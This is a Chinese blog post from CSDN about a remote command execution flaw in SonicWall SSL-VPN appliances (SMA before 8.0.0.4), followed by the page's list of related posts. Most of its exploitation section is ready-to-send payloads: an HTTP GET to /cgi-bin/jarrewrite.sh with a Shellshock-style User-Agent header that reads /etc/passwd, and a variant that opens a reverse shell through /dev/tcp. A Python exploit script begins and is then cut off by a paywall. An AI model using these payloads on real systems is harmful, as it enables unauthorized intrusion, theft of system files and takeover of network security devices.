SonicWall SSL-V**远程命令执行漏洞

最新推荐文章于 2024-06-25 09:10:20 发布
最新推荐文章于 2024-06-25 09:10:20 发布
阅读量990 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41832837/article/details/113471138
版权
SonicWall SSL-V**产品因Linux内核和HTTP CGI程序的漏洞,允许远程攻击者通过命令注入获取权限,可能导致服务器完全被接管。受影响的是Sonic SMA < 8.0.0.4版本。已知POC包括反弹shell的EXP脚本,利用方法涉及python EXP脚本和目标URL、监听IP、监听端口。
摘要由CSDN通过智能技术生成

漏洞详情

SonicWall SSL-V** 产品中使用了极为老旧的 Linux 内核和 HTTP CGI 可执行程序,该程序在处理 http 请求时,无法正确的解析 http header。该漏洞导致命令注入,远程攻击者通过注入命令可以轻松的获得nobody用户权限的控制权限。同时由于老旧内核的问题以及其中存在漏洞的可执行程序,攻击者可以轻易的提升权限并完全接管该服务器。

漏洞影响

Sonic SMA < 8.0.0.4

漏洞利用

POC:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 

User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'

image

反弹shell:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 

User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/ip/port 0>&1 &"

反弹shell的EXP脚本:

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phin
最低0.47元/天 解锁文章
「已注销」
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SonicWall 远程命令执行漏洞
PeiQi的博客
01-26 3777
SonicWall SSL-VPN 远程命令执行漏洞 漏洞描述 SonicWall SSL-VPN 远程命令执行在1月24日被公开 EXP,此设备存在远程命令执行漏洞 漏洞影响 SonicWall SSL-VPN FOFA app=“SONICWALL-SSL-VPN” 漏洞复现 出现漏洞的文件为 /cgi-bin/jarrewrite.sh #!/bin/bash # jarrewrite.sh: # Script takes a jar/class file and a working dir
Sonicwall-Backup-Scripts:一对用于备份Sonicwall安全设备的bash脚本
02-21
Sonicwall备份脚本用于从Sonicwall安全设备提取备份文件的脚本。 在SonicOS 6.5推出云备份和计划备份功能之前,我正在为Sonicwalls开发基于Web的备份系统。 6.5版发布后,我放弃了该项目,今年早些时候重新访问了该...
SonicWall远程命令执行漏洞
thelostworld
01-28 1393
SonicWall SSL-VPN 远程命令执行漏洞 一、漏洞描述 ​ SonicWall SSL-VPN 历史版本远程命令执行漏洞以及相关利用脚本。由于SonicWall SSL-VPN使用了旧版本内核以及HTTP CGI 可执行程序,攻击者可构造恶意其HTTP请求头,造成远程任意命令执行,并获得主机控制权限 二、漏洞复现 exp: GET /cgi-bin/jarrewrite.sh HTTP/1.1 Host: thelostworld:8080 User-Agent: () { :;..
【网络安全】漏洞挖掘之CVE漏洞复现
最新发布
anquan2233的博客
06-25 742
这个比 Shiro550、Shiro721 要增加一些东西,首先看 pom.xml 这个配置文件,因为漏洞是 shiro 1.0.0 版本的。Shiro 在路径控制的时候,未能对传入的 url 编码进行 decode 解码,导致攻击者可以绕过过滤器,访问被过滤的路径。的 bypass 方式也是合理的,可能一些其他特殊字符也是可以的,前提是对请求并不造成影响,像。继续往下走,判断 html 的目录与当前请求的目录是否相同,因为我们请求被拆分出来是。的匹配范围,这里之前我们设定的访问方式是。
SonicWall 防火墙曝严重漏洞,有些设备仍无补丁
smellycat000的专栏
03-29 759
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全硬件厂商 SonicWall 修复了位于 SonicOS 安全操作系统中的一个严重漏洞,可导致拒绝服务攻击以及远程代码执行 (RCE)。该漏洞的编号为CVE-2022-22274,是一个栈缓冲区溢出漏洞,CVSS 评分 9.4。影响版本该漏洞影响适用于中小企业的 TZ 系列入门级桌面版下一代防火墙 (NGFW)、旨在...
SonicWall Secure Mobile Access REC漏洞分析
qq_40466372的博客
02-16 377
SonicWall Secure Mobile Access远程代码执行漏洞
漏洞情报 | SonicWall SMA100 多个漏洞通告
爱国小白帽
03-16 552
0x01 漏洞简介 Sonicwall:成立于 1991 年,主要进行全面互联网安全解决方案的设计、开发和生产,为广大的市场提供访问安全、增值安全服务和交易安全产品。 近日,360漏洞云监测到Sonicwall官方发布了旗下SonicWall SMA100产品多个漏洞的安全通告,CVE编号包括CVE-2021-20017,CVE-2021-20018。 0x02 漏洞详情 CVE-2021-20017 SonicWall SMA100远程命令执行漏洞 漏洞描述:此漏洞允许经过身份验证的攻击者以’nobo.
SonicWALL OS 6.5高级技术培训手册V1.1.pdf
05-17
SonicWALL高级技术培训手册,主要针对SonicWALL常用配置例如NAT、等进行了详细的说明并且有相关配置例子。
SonicWall Content Filtering Extension-crx插件
04-02
SonicWall内容过滤扩展仅与SonicWall内容过滤服务器一起使用。 仅在Chromebook上运行的Chrome操作系统支持该服务器和扩展程序。 此解决方案仅适用于客户帐户,必须通过Google管理控制台完成所需的配置。 如果分机和...
SonicReader:Sonicwall 配置文件读取器-开源
05-30
SonicReader 用于查看和保存 Sonicwall 配置文件的内部报告。 这对于那些希望了解其保存的 Sonicwall 配置中的设置的人很有用。 我与 Dell Sonicwall 没有任何关系。 请不要就该程序的使用与 Dell Sonicwall 联系。
SonicWALL NSA 3600防火墙中文固件
12-25
SonicOS Enhanced 6.2.0.1-24n.zhc版本
Sonic Wall 典型配置中文版
09-05
目的: 熟悉典型客户网络环境下防火墙的配置方法 分析LOG及借助工具软件诊断并解决问题的方法 掌握SonicWALL标准版和增强版的基本配置 熟悉TCP/IP协议及基本网络通信协议 通过此次培训,使参加培训的工程师能够掌握典型客户的 防护墙配置,并在发生问题时及时解决问题。
SonicWALL防火墙配置
07-22
资源名称:SonicWALL防火墙配置资源目录:【】onicWALL防火墙配置 Access Rules 禁止某些 PC访问外网【】SonicWALL 防火墙 HA 配置【】SonicWALL 设备注册 2011中文版【】SonicWALL 防火墙对于中国3G卡的配置【】...
competitive_matrix-balance
02-22
- **SonicWall**:TZ170。 ##### 2. **硬件配置** - **Peplink**:提供32MB RAM/16MB FLASH的配置。 - **Cisco**:采用PowerPC 266/333MHz处理器。 - **Fiberlogic**:采用IXP425 166Mhz/16MB的配置。 - **XRoads*...
Sonicwall_NetExtender_v6.0.181
06-18
Sonicwall NetExtender v6.0.181:远程接入利器详解》 Sonicwall NetExtender是一款由戴尔公司开发的强大的安全远程访问解决方案,它为用户提供了一种安全、便捷的方式,使他们能够在任何地方,只要连接到互联网...
配置SonicWALL防火墙
11-04
如何配置SonicWALL防火墙,并图文指导用户配置该设备防火墙设置。
SonicWall:速度修复这些严重的 SMA 100 漏洞
smellycat000的专栏
12-09 353
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全厂商 SonicWall 督促客户将 SMA 100 系列设备更新至最新版本,因为这些设备中存在多个漏洞,可导致远程攻击者完全接...
勒索团伙正奔向 SonicWall 设备
smellycat000的专栏
06-10 237
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士几个月前,网络犯罪团伙越来越多地攻击 SonicWall 设备,攻陷企业网络并部署勒索软件。这些攻击发生在源自思杰、F5、Puls...
一个简单的apache cgi-bin
weixin_33778544的博客
02-07 337
//在基于域名的虚拟主机配置文件上加上一条 [root@centos129 vconf.d]# cat nvhsot.conf <VirtualHost 172.16.148.129:80> ServerName www.zhoutao.name ScriptAlias /cgi-bin/ "/www/zhoutao.name/cgi-bin/" Do...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值